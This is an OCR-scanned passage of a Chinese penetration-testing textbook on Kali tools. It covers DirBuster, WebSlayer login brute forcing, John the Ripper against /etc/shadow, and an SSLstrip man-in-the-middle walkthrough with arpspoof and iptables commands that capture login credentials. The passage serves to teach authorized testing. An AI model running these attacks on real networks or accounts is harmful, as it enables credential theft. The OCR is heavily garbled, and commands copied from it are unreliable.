它 的 霹 法 可 能 会 非常 复杂 ， 而 且 站 点 跟 站 点 之 间 也 会 变化 。 在 同一 个 网 站 上 也 可 能 会 不 同 。 
我 们 推 存 你 先 在 实验 室 中 掌握 了 Tamper Data 和 Hvydra， 然 后 再 在 现场 渗透 测试 中 使 用 。 


3.4.2 DirBuster 


DirBuster 是 为 又 力 破解 Web 应 用 服务 天 上 的 目录 和 文件 名 而 设计 的 。 很 多 情况 下 ，Web 服 务 
价 看 上 去 依然 是 先 认 安装 后 的 状态 ， 而 应 用 和 网 页 实际 上 虱 隐 藏 在 里 面 。DirBuster 就 是 为 了 找 出 
这 些 隐 藏 的 因 系 而 设计 的 。 


DirBuster 可 以 在 Web Applications > Web Crawlers 中 找到 ， 名 为 dirbuster。 打 开 后 ， 必 须 填 
完 某 些 字 有 段 后 才能 发 起 攻击 。 至 少 必 须 输 入 目标 URL， 选 择 线 程 数 ( 我们 建议 最 多 不 超过 100 ) 
及 文件 列表 。 你 可 以 点 击 Browse 来 选择 默认 的 列表 或 是 目 己 设置 。 
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Kali 的 有 些 版 本 可 能 并 未 包含 默认 的 字典 。 你 可 以 在 线 下 载 默认 字典 ， 然 后 
将 DirBuster 指 向 它们 ， 如 下 面 的 截图 所 示 : 


OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing 


File Options About Help 


Target URL (eg http://example.com:80/) 


http://www.thesecurityblogger.com 


Work Method Use GET requests only © Auto Switch (HEAD and GET) 


100 Thre... 


© List based brute force 


a Number Of Threads [ | Go Faster 


Select scanning type: .) Pure Brute Force 


File with list of dirs/files 


/root/Desktop/wordlist. Ist 


| [和 Browse | 


© List Info 


Select starting options: 
[v] Brute Force Dirs 


[v] Brute Force Files 


») Standard start point 


[v] Be Recursive 


( ) URL Fuzz 


Dir to start with |/ 


[| | Use Blank Extension 


File extension php 


| exit j 


Please complete the test details 


填 完 基本 信息 后 , 点 击 Start，DirBuster 会 开始 漏洞 评估 。 很 有 可 能 它 会 说 完成 时 间 会 是 在 几 
天 后 。 不 过 ， 你 通 稼 能 够 在 几 分 钟 内 就 找到 有 用 的 数据 。 下 面 的 截图 中 找 出 了 一 个 很 有 趣 的 
/cgi-bin/ 目 录 : 


OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing 


File Options About Help 


http://www.thesecurityblogger.com:80/ 
© Scan Information ' Results - List View: Dirs: 566 Files: 0 \ Results - Tree View \ / Errors: 9 | 


Type | 
Dir /stats/ 
Dir /wp-content/ 
Dir / 
Dir /cgi-bin/ 
Dir /2005/ 
Dir Iwp-includes/ 
Dir /06/ 
Dir /sitemap/ 
Dir I2/ 
Dir /09/ 
Dir /07/ 
Dir /08/ 
Dir fevents/ 
‘Dir Ikevaen/ 


Current speed: 275 requests/sec 


Found Response 


(Select and right click for more options) 
Average speed: (T) 135, (C) 191 requests/sec 


Parse Queue Size: 0 
Total Requests: 2970/235452436 


Current number of running threads: 100 


| Change | 


Time To Finish: 14 Days 


F | 


il Pause | | 


O Stop | 


Starting dir/file list based brute forcing lidentity/13.php 
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只 要 HTTP 啊 应 的 状态 码 不 是 404， 这 个 网 页 就 是 可 以 进行 暴力 破解 攻击 的 。 要 在 锁定 中 将 
日 标 锁定 为 /cgi-bin/， 点 击 Stop 来 结束 扫描 ， 然 后 点 击 Back。 在 主 界面 上 ，Start 上 方 ， 有 个 选择 
漏洞 评 佑 起 点 的 字段 。 要 扫描 /cgi-bin/ 目 录 内 部 ， 可 以 在 该 字段 输入 该 目录 然后 点 击 Start。 


Dir to start with |/cgi-bin/| 


极 有 可 能 你 会 发 现 目录 中 还 有 目录 要 测试 。 重 复 同 样 的 停止 、 更 新 起 始 字段 、 执 行 扫描 的 过 
程 ， 进 一 步 理 清 目标 的 情况 。 下 面 的 截图 显示 了 /cgi-bin/ 目 录 内 的 树 状 图 关系 : 


OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing 


File Options About Help 


http://www. thesecurityblogger.com:80/cqi-bin/ 


@ Scan Information’ Results - List View: Dirs: 815 Files: 827 ‘ Results - Tree View ` / Errors: 30 \ 
Response 
/eqgi-bin/ 
/cgi-bin/article/ 
/cgi-bin/special/ 
/cgi-bin/support/ 
Icgi-bin/08/ 
/cgi-bin/lagin/ 
/cgi-bin/2004/ 
Icgi-bin/18/ 
/cgi-bin/help/ 
Icgi-bin/sp/ 
Icgi-bin/profile/ 
/cgi-bin/policies/ 
/cgi-bin/more/ 
:ai-bin/into 
Current speed: 134 requests/sec (Select and right click for more options) 


Average speed: (T) 43, (C) 87 requests/sec 


Parse Queue Size: D Current number of running threads: 100 


Total Requests: 2928/337606829 | |] | change | 


Time To Finish: 44 Days 
| 43 Back | Il Pause [] .. =| Report 


DirBuster Stopped /cgi-bin/201/ 


你 可 以 点 击 Report 按 钮 来 将 探索 结果 转换 成 报告 的 形式 。 你 需要 选择 保存 报告 的 位 置 , 然后 
点 击 Generate Report。 然 后 会 看 到 在 弹出 的 文本 文件 中 展示 了 你 发 现 的 内 容 。 
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DirBuster 1.0-RC1 Report Viewer 


/root/Desktop/DirBusterReport-www.thesecurityblogger.com-80. txt 


Full Text! | Simple List \ XML | CSV | 
DirBuster 1.0-RC1 - Report 
http://www. owasp. org/index. php/Category: OWASP DirBuster Project 
Report produced on Thu May 09 15:28:10 EDT 2013 


Directories found during testing: 
Dirs found with a 403 response: 


/cgi-bin/ 
/cgi-bin/test/ 


Dirs found with a 503 response: 


/cgi-bin/features/ 
/cgi-bin/page/ 
/cgi-bin/5/ 
/cgi-bin/22/ 
/cgi-bin/docs/ 
/cgi-bin/20/ 
/cgi-bin/downloads/ 
/cgi-bin/4/ 
/cgi-bin/main/ € 


| 3 Close | 


3.4.3 WebSlayer 


WebSlayer 72 — “+ Web Ji FH FE Fr 2& JI WE ft LH o WebSlayer n] VA HJ OK 2& JI hec fige ze f. 
(User/Password )、GET 和 POST 人 参数， 也 可 以 用 于 找 出 没有 被 链接 的 资源 ， 如 脚本 、 文 件 、 目 
录 等 。WebSlayer 提 供 了 载 人 向 生成 需 和 结果 分 析 需 。 


Attack Setup 标 签 中 有 一 个 ur 字段， 这 里 必须 填 上 目标 的 URL。 在 URL 字 段 下 面 是 Headers 
和 了 POST 数据 输入 文本 框 。 它 还 有 一 个 设置 载 傈 类 型 的 选项 ， 选 项 可 以 是 Dictionary、Range 
或 是 Payload。Dictionary 可 以 是 包含 载 集 信息 的 文件 ， 它 可 以 是 定制 的 文件 ， 也 可 以 是 从 可 
用 字典 列表 中 选择 的 某 个 字典 。Range 设 置 可 用 来 指定 攻击 的 范围 。Payloaq 设 置 可 以 从 Payload 
Generator 标 签 中 导入 一 个 载 何 。 下 面 的 截图 显示 了 锁定 了 wwwthesecuritybloggercom 的 WebSlayer: 


x WebSlayer 


2 Attack setup | ® Payload generator .| Attack results > RequesteR = Encoder = Logs + Help 


ty by 


Url: | http://www.thesecurityblogger.com/FUZZ 


User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 


Headers: 


POST Data: 


Payload type: | Dictionary v | Inject in all parameters: | Headers v | Authentication: | basic v 


Dictionary : |Injections/Traversal.txt | Encoding FUZZ: — |md5 


Dictionary 2: | vulns/sql inj.txt Encoding FUZ2Z: | html encoder 


Filtering Discovery options | Connection options 


Threads: | 5 *| Time delay: 0 | 


Proxy: | | O Anonymous browsing 


in ^ iae A eee he Urs PRAY De. BE, FAR, APS, Ta 
卡 、 用 户 名 和 其 他 设置 。 你 可 以 进行 拼接 ， 生 成 最 终 的 攻击 负载 ,然后 上 传 到 攻击 标签 进行 定制 
攻击 。 


这 里 讲 一 个 在 Payload Generator 标 签 中 定义 数值 范围 载荷 的 例子 。 你 可 以 在 下 面 的 截图 中 
看 到 ， 这 个 例子 中 ， 我 们 将 数值 范围 载 傈 设 成 了 从 0 到 1000。 范 围 选 好 后 ， 点 击 add generator 按 
钮 ， 它 最 终 会 生成 一 个 临时 生成 融 。 将 新 创建 的 生成 需 拖 到 底部 的 Payload Creator 中 ， 点 击 
Generate Payload。 我 们 现在 可 以 在 Attack Setup 中 导入 刚刚 创建 的 攻击 载荷 了 。 
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* WebSlayer 


FINAL PAYLOAD: 


Temporal Generators 
PRange00 


|o s| To | 1000 [入 | 
O Fix width Width: [o A 
| © Add generator | 


You can make numeric payloads: 


coe -0o ut 5» uüu'.H mno 


| 一 


Example from 0 to 31, 
Or with fixed width from 000 to 031 


Payload Creator | Payload Modifier | gå Save Payload | 


| © Drop Payload | 
Pattern: | [@PRange00G@] XÜ Generate PAYLOAD | 
| o Delete selection | 


在 将 载 傈 导入 到 攻击 场景 中 或 是 选择 好 默认 字典 后 ， 必 须 指定 用 WebSlayer 将 该 载 何 注入 到 
哪里 。 你 可 以 在 要 攻击 的 URL 中 用 FUZzz 关 键 字 。 举 个 例子 ,下面 的 蕉 图 在 攻击 URI 字 上段 中 显示 了 
日 标 为 http://www.thesecurityblogger.com/FUZZ， 其 中 FUZz 就 是 一 个 攻击 ， 它 利用 了 WebSlayer 中 
己 有 的 两 个 字典 : 


pg EN [r- VETE UESTRE TERI - TM RRT 3 = 
generator |. | Attack results | ;; RequesteR <= Encoder = Logs 
Ce ENE chemise IAM Mee ee v oes LEC 


Mover Permanently 


The document has moved here. 


AN Search [o] 


Attack finished OK 
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WebSlayer 可 以 攻击 HITP 请 求 中 的 任何 部 分 ， 比 如 首部 身份 认证 。 为 了 让 WebSlayer 傣 力 
破解 Web 服 务 器 的 密码 ， 我 们 必须 知道 用 户 名 ， 否 则 这 个 攻击 很 难 成 功 。 你 需要 抓 取 HTTP 请 求 
并 答 试 做 一 个 登录 ， 这 样 才能 抓 到 攻击 中 需要 用 到 的 用 户 代理 和 内 容 。 


T) Live HTTP Headers 


by Daniel Savard, Nikolas Coukouma 


View HTTP headers of a page and while browsing. 


Download Now 


Firefox 提 供 了 一 个 名 为 Live HTTP Headers 的 插件 。 你 可 以 在 尝试 登录 到 目标 服务 器 时 用 它 
来 收集 这 些 信 息 。 下 面 的 例子 演示 了 在 用 Live HTTP Headers 抓 取 数 据 包 时 ， 用 户 joeymuniz 用 
了 一 个 错误 的 密码 。 


Live HTTP headers 


_ Headers Generator Config About | 


HTTP Headers 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0 
Accept: */* 
Accept-Language: en-US,en;g=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 
Hash: MzFhMDqwMWZjZjBhY mU3ZAfDihnCg 1/DqyAeWGOQswo3Cn33DnH8YwenCsjlUw5BWU3grQExHw6jCsMOKw7vChMKywoHCv8SKZw5. .. 
X-Requested-With: XMLHttpRequest 
Referer: https: / /new.myspace.com/signin 
Content-Length: 80 
Cookie: MSCulture-IP-68.33.192.126&IPCulture-en-US&PreferredCulture en-US&PreferredCulturePending - &Country- VVM - &ForcedE... 
Connection: keep-alive 
Pragma: no-cache 
Cache-Control: no-cache 
email=joeymuniz&password=happyjoyjoyépageld=alc3a0e7-al02-495f-bi22-1a82b8 labeec 


UTTE | 


| Save All... | Replay... [w] Capture | 


EMAIL OR USERNAME 
f with Facebook 


joeymuniz 


MY with Classic Myspace 


PASSWORD 


|_| Stay signed in 


Don't have a New Myspace account? Create one now. 
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在 Live HTTP Headers 中 抓 取 的 用 于 WebSlayer 的 重要 信息 是 User-Agent 和 Login Credentials, 
如 下 面 的 截图 所 示 : 


Live HTTP headers 


Generator Config About | 


HTTP Headers 


POST /ajax/account/signin HTTP/1.1 

Host: new.myspace.com 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0 
Accept: */* 

Accept-Language: en-LS,en;q-0.5 

Accept-Encoding: gzip, deflate 


Live HTTP headers 


size] Generator Config | About | 


HTTP Headers 
Accept-Encoding: gzip, deflate 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 
Hash: MzFhMDgwMW2jzZjBh¥mU3ZAfDihnCg1/DgyAeWGOswo3Cn33 DnH8YwoenCs]lUwS BWU3grQExHw6jCsMOKw?vChMKywoHCv8kKZwe... 
X-Reqguested-With: XMLHttpRequest 
Referer: https://new.myspace.com/signin 
Content-Length: 80 
Cookie: MSCulture-IP-68.33.192.126&IPCulture-en-US&PreferredCulture -en-US&PreferredCulturePending-&Country- VVM - &ForcedE... 
Connection: keep-alive 
Pragma: no-cache 
Cache-Control: no-cache 
email -joeymuniz&password =happyjoyjoy&pageld=alc3a0e7-a102-495f-b322-1la82b8laGeec 


HTTP/1.1 401 Unauthorized 
Vary. Accept-Encoding 
Set-Cookie: visit id-4d3fe7318-3c8f-4bcd-8446-588fb321cl4f; domain-.myspace.com; path-/; expires=Tue, 30 Apr 2013 15:27:40 ... 


M Usd ie Llas-k obe] eas a A a) 


| Save All... | | Replay... | (A Capture 


用 户 代 理 信息 会 出 现在 HITTP 首 部 部 分 ,而 登录 信息 会 出 现在 POST 数据 部 分 。URL 应 该 跟 登 
录 页 匹配 。Authentication 部 分 提供 了 不 同 的 安全 等 级 和 用 户 名 空间 。 


下 面 的 这 个 例子 演示 了 利用 Live HTTP Headers 中 抓 取 的 登录 信息 来 尝试 访问 myspace。 错误 
的 密码 换 成 了 FUZzZ ， 这 样 WebSlayer 就 知道 哪个 部 分 需要 尝试 暴力 破解 。 这 个 例子 中 ， 
Authentication 标 签 有 不 同 的 安全 选项 ， 身 份 认证 方式 设 成 了 基本 模式 ， 用 户 名 为 joeymuniz， 
后 跟 关 键 字 FUZZ。 


~ vv x WebSlayer 
File 


¿è Attack setup | €^ Payload generator .| Attack results > RequesteR = Encoder = Logs ~ Help 


Url: | https://new.myspace.com/signin 


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rev:20.0) Gecko/20100101 Firefox/20.0 


Headers: 


email-2joeymuniz&password-FUZZ-a1c3a0e7-a102-495f0b322-1a82b81a6eec 


POST Data: 


Payload type: | Dictionary v | Inject in all parameters: | Headers v | Authentication: | basic v | | joeymuniz:FUZZ | 


Dictionary : |None vj | | ordlist/general/big.txt) Encoding FUZZ: | None 


Dictionary 2: | None v) | | Encoding FUZ2Z: | html encoder 


Filtering Discovery options | Connection options 


Threads: |5 “| Time delay: |0 | | Q Start! | 


Proxy: | 1 Anonymous browsing 


你 可 以 简单 地 输入 网 站 、 用 户 代 理 、 内 容 和 已 知 用 户 名 。 可 以 在 需要 密码 的 地 方 输入 关键 字 
FUZZ, 然后 选择 字 骨 来 对 这 些 登 录 空 间 进行 暴力 破解 。 这 是 对 Web 服 务 需 进行 目 动 化 又 力 破 解 的 
一 个 简单 途径 。 


| myspace 实 际 使 用 的 身份 认证 方式 要 比例 子 中 介绍 的 强 一 些 。 


寓 有 安全 功能 如 账户 锁定 的 目标 可 能 不 会 受 这 个 工具 的 影响 。 如 有 果 你 锁定 的 目标 是 个 受 监控 
的 资产 ， 那 么 高 级 安全 工具 如 IPSADS 技 术 很 有 可 能 会 发 出 警报 。 出 于 这 些 原 因 ， 在 没有 进行 充 
分 的 侦察 工作 前 ， 我 们 要 谨慎 将 WebSlayer 用 于 在 线 目 标 。 


WebSlayer 提 供 了 将 载 何 和 结果 导出 为 文本 和 HTML 格 式 的 功能 。 我 们 也 可 以 抓 取 日 志文 件 ， 
将 其 粘贴 到 文本 文件 中 。 


35 Be RR! 


aj 
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Analysis for: https://new.myspace.com/signin 


Analysis date: 2013-04-29 23:53:40 


[Code |#Lines |#Words |Url 
200 |648L [13545W [http://www. ‘ity 
200 [648L {13545Ww|http:/Awww.thesecurity 
200 |648L [13545W [http://www.thesecurity 


200 |648L [13545W http: 
200 [648L |13545W http: 
200 |648L [13545W http: 
200 |648L |13545W http: 
301 7L [20W  [http: 
200 |648L [13545W http: 


200 |648L [13545W [http: 


200 |648L /]13545W http: 


Webslayer an OWASP Project 


3.5 ”破解 密码 


密码 是 用 户 在 系统 上 认证 身份 最 常用 的 方法 。 在 对 目标 系统 进行 漏洞 利用 时 , 通常 也 能 找 出 
能 够 访问 其 他 系统 的 密码 。 在 第 4 章 中 ， 我 们 会 用 一 节 专 门 介绍 如 何 用 Kali 中 Marr 
解密 码 。 下 一 节 首 先 用 Kali 中 一 个 很 流行 的 工具 破解 密码 。 


John the Ripper 


John the Ripperzé 6 今天 最 广 为 使 用 的 密码 破解 锅 。 它 有 几 个 引擎 ,用 以 破解 不 dete ， 
包括 加 密 过 的 密码 和 散 列 化 的 密码 。John the Ripper 能 够 自动 检测 多 数 散 列 和 加 密 过 的 密码 ， 
大 大 方便 了 渗透 测试 人 员 。 攻击 者 喜欢 这 个 工具 是 因为 它 的 可 定制 性 非常 强 ， a 
同 的 方法 来 加 速 密码 破解。 


John the Ripper 可 以 按 如 下 方式 运行 : 


口 尝试 用 字典 中 的 单词 来 破解 密码 ; 

O 在 字典 单词 词 首 或 词尾 加 上 字母 数字 字符 ， 用 以 破解 ; 
Q 将 字典 单词 放 在 一 起 ; 

口 将 字母 数字 字符 放 到 一 起 拼 成 单词 ; 

a 使 用 混合 了 特殊 字符 的 字典 单词 尝试 破解 ; 

口 在 所 有 其 他 方式 部 没 能 成 功 破 解 时 ， 和 尝试 壤 力 破解 。 


使 用 这 个 工具 的 最 佳 实践 是 经 常 更 新 默认 字典 。 我 们 发 现 默 认 的 单词 列表 很 有 限 ( 只 有 3115 
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个 单词 )， 在 很 多 情况 中 还 破解 不 了 普通 密码 。 你 可 以 借助 谷歌 来 搜索 字典 。 要 验证 新 的 单词 列 
表 的 大 小 ， 打 开 终端 ， 将 单词 列表 文件 加 载 到 当前 目录 后 ， 调 用 单词 计数 命令 wc (word count )。 
我 们 要 用 的 具体 命令 为 wc -1 filename. 

通常 在 从 互联 网 上 下 载 和 合并 多 份 单词 列表 时 , 列表 中 可 能 会 出 现 重 复 的 单词 。 我们 建议 删 
除 重复 的 单词 ， 并 将 所 有 的 大 写字 母 蔡 换 成 小 写字 母 ， 因 为 John 会 日 动 切换 大 小 写 格 式 控制 。 这 
里 举 个 蔡 换 单词 中 大 写字 母 的 例子 : 


tr A-Z a-z < CustomWordFile=""> AllLowerCaseFile 
下 面 是 去 重用 的 命令 : 

sort -u AllLowerCaseFile > NoDuplicatesOrUpperCase 
你 可 以 对 新 生成 的 合并 文件 调用 wc 命令 来 检查 单词 数 : 


wc -1 NoDuplicatesOrUpperCase 


要 在 Kali 中 打开 John the Ripper, X) w Password Attacks > Offline Attacks， 然 后 选取 John。 
它 会 打开 一 个 命令 行 终端 。 


| Johnny John the Ripper 的 一 个 GUI 程序 。Johnny 会 在 第 4 章 中 介绍 。 | 


你 可 以 对 John the Ripper 的 速度 进行 基准 测试 ， 输 入 john -test 就 能 知道 它 运行 速度 有 多 快 了 。 


要 使 用 定制 过 的 单词 文件 , 比如 前 个 例子 中 生成 的 NoDuplicatesOrUpperCase s 你 需要 
编辑 默认 的 单词 列表 。 它 位 于 默认 的 John the Ripper 目 录 下 的 john.conf 文 件 中 。 在 该 文件 中 ， 你 会 
发 现 单词 列表 指 癌 了 默认 的 password.lst。 


# Wordlist file name, to be used in batch mode 


word l 1st = SJOHN/ Dasswo ra. st 


将 文件 列表 改 成 新 的 单词 列表 文件 的 名 字 。 参 考 前 面 的 例子 ， 你 可 以 将 它 改 成 wordqlist = 
NoDuplicatesorUppercase.1st。 新 的 单词 列表 文件 必须 放 到 john.conf 文 件 中 指定 的 目录 里 。 
默认 的 目录 是 位 于 soHN 变 量 指定 的 目录 中 。 


要 将 John the Ripper 和 密码 文件 配合 使 用 ， 首 先 需要 将 目标 文件 复制 到 指定 的 John 目 录 。 调 
用 复制 命令 cp 来 将 该 文件 移动 到 John 上 日 录 。 举 个 例子 ， 要 复制 shadow 文 件 (Linux 系 统 中 管见 的 
一 个 密码 文件 )， 可 以 输入 cp /etc/shadow。 


当 该 文件 跟 John the Ripper 放 到 一 起 后 , 调用 命令 john, 后 跟 该 文件 名 。 因 此 如 果 要 将 John the 
Ripper 和 shadow 文 件 一 起 运行 ， 输 入 john shadow. 
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你 可 以 按 下 回 车 键 来 检查 John the Ripper 的 进度 ， 它 会 显示 当前 正在 试探 的 密码 ， 以 及 每 秒 
钟 的 破解 数 ， 单 位 为 c/s。 

可 以 用 组 合 键 Ctrlt+C 来 暂停 John the Ripper 的 进度 。 如 果 你 是 调用 john FILE 来 重新 运行 
John， 它 会 从 你 上 次 暂停 的 位 置 继 续 。 


在 John the Ripper 运 行 结束 时 ， 查 看 结果 可 以 输入 john -show FILE。 那 么 查看 shadow 文 件 
的 情况 ， 则 输入 john -show shadow 即 可 。 


有 关 John the Ripper 的 详细 资料 ， 可 以 参考 http:/www.openwall.com。 


3.6 ”中 国人 攻击 


在 标准 定义 中 ， 中 间 人 攻击 (MITM, Man-In-The-Middle ) 是 指 攻击 者 跟 受 害 者 分 别 建立 独 
立 连接 的 一 种 侵入 式 攻 击 。 中 间 人 攻击 最 常 出 现在 主机 系统 之 间 。 前 不 久 曾 出 现 过 一 个 漏洞 ， 它 
侵入 了 将 用 户 从 非 安 全 网 页 连接 到 安全 网 页 的 系统 。 这 样 攻击 者 可 以 窃取 那些 连接 到 安全 Web 服 
务 器 的 用 户 的 数据 。 后 面 一 节 会 介绍 这 个 漏洞 。 和 常见 的 中 间 人 攻击 会 在 本 书后 面 章节 中 介绍 。 


SSL strip 工具 


2009 年 ， 安 全 研究 员 Moxie Marlinspike 在 DefCon 上 发 布 了 SSL strip 工 具 。 他 介绍 了 SSIL 会 话 
支持 的 基本 概念 ,这 是 一 种 中 间 人 攻击 的 形式 。 其 中 网 络 攻击 者 代理 的 是 来 自用 户 的 HTTPS 请 求 ， 
而 非 可 以 被 拦截 和 算 改 的 通过 HTTP 发 送 的 请 求 。SSL strip 可 以 将 这 种 攻击 上 自动化， 允许 第 三 方 
拦截 到 安全 站 点 的 数据 连接 。 随 后 ， 人 们 制定 了 HTTP 严 格 传输 安全 协议 (HSTS, HTTP Strict 
Transport Security Speification ) 来 应 对 这 类 攻击 ,但 HSTS 的 部 署 进程 非常 缓慢 。 时 至 今日 ，SSL 
会 话 劫持 攻击 依然 广 为 使 用 。 


本 市 , 我 们 只 会 用 到 一 个 网 卡 接口 。 你 的 虚拟 机 中 可 能 配 了 多 个 网 卡 接口 。 我 们 需要 先 检 查 
征 否 局 用 了 多 个 虚拟 的 网 卡 接口 。 


在 桌面 的 左上 角 ， 点 击 Xterm 链 接 打开 命令 行 终端 。 我 们 用 ifconfig 来 确定 虚拟 机 上 启用 
了 哪些 网 卡 。 


具体 的 命令 是 ifconfig | grep "eth"， 它 会 从 所 有 各 式 各 样 的 网 口中 过 滤 出 以 太 网 卡 ， 
然后 输出 显示 如 下 : 


如 果 忆 用 了 不 止 一 个 网 卡 ， 调 用 命令 ifdown 后 跟 网 卡 名 来 将 其 关闭 。 举 个 例子 ,我 们 有 两 
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个 名 为 eth0 和 etn1 的 网 卡 ， 可 以 调用 ifdown eth0 命 令 来 天 闭 网 卡 eth0。 你 可 以 关闭 所 有 不 用 
的 网 卡 。 


:~# ifdown ethO 
Internet Systems Consortium DHCP Client 4.2.2 
Copyright 2004-2011 Internet Systems Consortium. 
ALL rights reserved. 
For info, please visit https://www.isc.org/software/dhcp/ 


Listening on LPF/eth0/00:0c :29:49:84:73 
Sending on LPF/eth0/00:0c :29:49:84:73 
Sending on Socket/ fallback 

DHCPRELEASE on ethO to 172.16.76.254 port 67 
Reloading /etc/samba/smb.conf: smbd only. 


要 让 SSL strip 中 间 人 攻击 (MITM ) 能 工作 ， 你 需要 两 部 分 信息 。 首 先 ， 需 要 知道 目标 的 IP 
地 址 。 其 次 ,需要 充当 子 网 网 关 的 路 由 器 的 IP 地 址 。 由 于 这 种 攻击 方式 只 对 跟 目 标 相同 的 第 二 级 
网 段 起 作用 ， 所 以 需要 找 出 我 们 的 默认 网 关 。 可 以 再 次 利用 命令 行 终端 。 


在 终端 会 话 中 调用 如 下 命令 : 


route -n 


:~# route -n 
Kernel IP routing table 
Destination Gateway Genmask Flags Metric Ref Use Iface 
0.0.0.0 172.16.76.2 0.0.0.0 UG 0 0 O ethO 
172.16.76.0 0.0.0.0 Pb 0 0 O ethO 
:~# route -n | grep 'UG' | awk '[print $2}' 
172.16.76.2 
TM | 


或 者 用 带 过 滤 功 能 的 shell 命 令 route -n | grep 'UG' | awk '{print s2}' 直接 输出 
SATA Io] X: 


File Edit View Search Terminal Help 
:~# route -n | awk '{print $2}' 


1. 开始 攻击 : BEA 


在 开始 从 SSL 会 话 中 收集 注入 用 户 凭 据 一 类 的 信息 之 前 ,我 们 需要 先 完 成 一 些 任务 。 需 要 移 
运行 允许 我 们 重 定 问 网 络 请 求 的 工具 。 此 外 ,需要 重 定 问 攻 击 主机 中 抓 取 的 请 求 ,这 样 才 能 将 用 
户 数据 包 转 发 给 SSL strip 工 具 。 我 们 先 要 在 Iptables 和 Arpspoof 工 具 中 启用 IP 转 发 功能 。 


下 面 三 步 会 进行 卫 转 发 、arpspoof 重 定向 和 端口 转发 配置 。 这 些 命令 都 是 在 命令 行 终端 中 执 
人 
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echo 1 > /proc/sys/net/ipv4/ip forward 


:~# echo 1 > /proc/sys/net/ipv4/ip forward 


在 这 个 例子 中 , 我 们 需要 知道 受害 者 或 目标 主机 的 耳 地 址 。 这 是 为 了 避免 让 所 有 攻击 主机 对 
整个 网 络 发 起 ARP 地 址 洪水 引起 注意 。 在 实际 的 攻击 场景 中 , 理想 情 次 下 虱 是 针对 整个 二 级 网 段 
运行 arpspoof ( 如 采 不 知道 受害 者 的 下地 址 ， 这 是 球 认 的 做 法 )， 同 时 可 以 选择 利用 抓 包 和 噢 探 
工具 来 进一步 判定 受害 者 的 IP 地 址 。 在 有 多 台 主 机 的 环境 中 ,这 种 做 法 可 能 会 引起 数据 的 流动 变 
慢 ， 同 时 使 得 攻击 者 被 发 现 的 几率 加 大 。 命 令 是 : 


arpspoof -i eth0 -t victimip default gateway ip 


root@kali: ^ 


:~# arpspoof -i ethO -t 10.0.1.240 10.0.1.1J 


建议 不 要 将 该 进程 放 到 后 台 执 行 , 而 是 保留 该 窗口 ,重启 一 个 新 的 终端 会 话 来 进行 其 他 操作 。 

2. EFHiptablesiZ£ V 95 L5 E [n] 

这 一 步 操作 可 以 帮助 攻击 者 抓 取 发 往 HTTP 服 务 器 上 TCP 80 端 口 的 数据 ， 并 将 其 重 定向 到 
SSL strip 的 监听 端口 。 在 本 例 中 ,对 于 目标 端口 和 重 定 回 目标 ,， 重 定 回 会 在 TCP 的 10000 端 口上 完 
Ro 攻击 者 可 能 会 使 用 任何 可 用 的 端口 。 这 里 选择 的 重 定 癌 目 标 也 必须 为 SSL strip 设 置 监听 端口 。 
命令 如 下 : 


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT 
--to-ports 10000 


:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 
ECT --to-ports 10000 


:-4 [| 


如 果 要 禁用 PREROUTNIG 规 则 ， 你 可 以 将 -A 替 换 成 -D 来 清除 所 有 在 用 的 
规则 。 


iptables -t nat -F #47 
iptables -t nat -L iH 


iptables 有 许多 选项 。 你 可 以 使 用 命令 man iptables 查 看 其 他 命令 选项 。 
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现在 已 经 一 切 就 纤 ， 可 以 开始 用 SSL strip 抓 取 数 据 了 。 


在 新 打开 的 命令 行 窗口 中 启动 sslstrip， 运 行 如 下 命令 来 运行 SSL strip 工 具 ， 并 开始 监听 


TCP 1000034 O : 


sslstrip -1 10000 


File Edit View Search Terminal Help 


:~# sslstrip —l 10000 


sslstrip 0.9 by Moxie Marlinspike running... 


在 目标 主机 上 ， 访问 在 线 邮 件 服务 ， 如 https:/www.hotmail.com， 并 登录 。 


Sign In 
(«4 ) login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1354549705&rver=6.1.6206.0&wp=MBl&wreply=http:% C 2 Google 


[3] Most Visited ~ É) Getting Started (dj Audiofile Engine... 50+ Ableton Liv... @ MacBook Pro: Ho... @ Apple ©! Yahoo! $ ! Google Maps 


@ Internet Explorer 
NM Hotmail 


Microsoft account What's this? 


Keep me signed in 


The entirely new browser 


Fast. Fluid. Perfect for touch. Get it with Windows 8. 


你 现在 应 该 能 看 到 SSL strip 攻 击 的 结果 了 。 


Q) (f) (ei) B 
» [£3 Bookmarks + 


3.7 小结 101 


在 下 面 的 例子 中 , 用 户 名 和 密码 都 被 遮挡 处 理 了 。 但 在 你 的 屏幕 上 应 该 是 以 


WA AT UA. 


root@kali: ~ 


File Edit View Search Terminal Help 


) 
SEND L3 ERROR: 2470 byte 
ipv4(): -1 bytes written 


! 
SEND L3 ERROR: 2470 byte 
ipv4(): -1 bytes written 


) 
SEND L3 ERROR: 2119 byte 
ipv4(): -1 bytes written 


) 
SEND L3 ERROR: 2470 byte 
ipv4(): -1 bytes written 


) 
SEND L3 ERROR: 2470 byte 


ipv4(): -1 bytes written 


packet (0800:06) destined 
(Message too long) 


packet (0800:06) destined 
(Message too Long) 


packet (0800:06) destined 
(Message too long) 


packet (0800:06) destined 
(Message too long) 


packet (0800:06) destined 
(Message too long) 


207.46.4.236 was not forwarded (libnet write raw 


207.46.4.236 was not forwarded (libnet write raw 


207.46.4.236 was not forwarded (libnet write raw - 


207.46.4.236 was not forwarded (libnet write raw 


207.46.4.236 was not forwarded (libnet write raw 


) 

HTTP : 66.220.158.27:80 -> USER: PASS: 0105 INFO: http://www. facebook .comy 
index.php ?st ype=Lo&j Lou=A fd-iEy36Ej Rp -kbdeXNCn3gAuzayU8G6j SUf IaMmIdFtiEsD9-zWIhlQpILlX3NOisja00VfpMEGYrn 
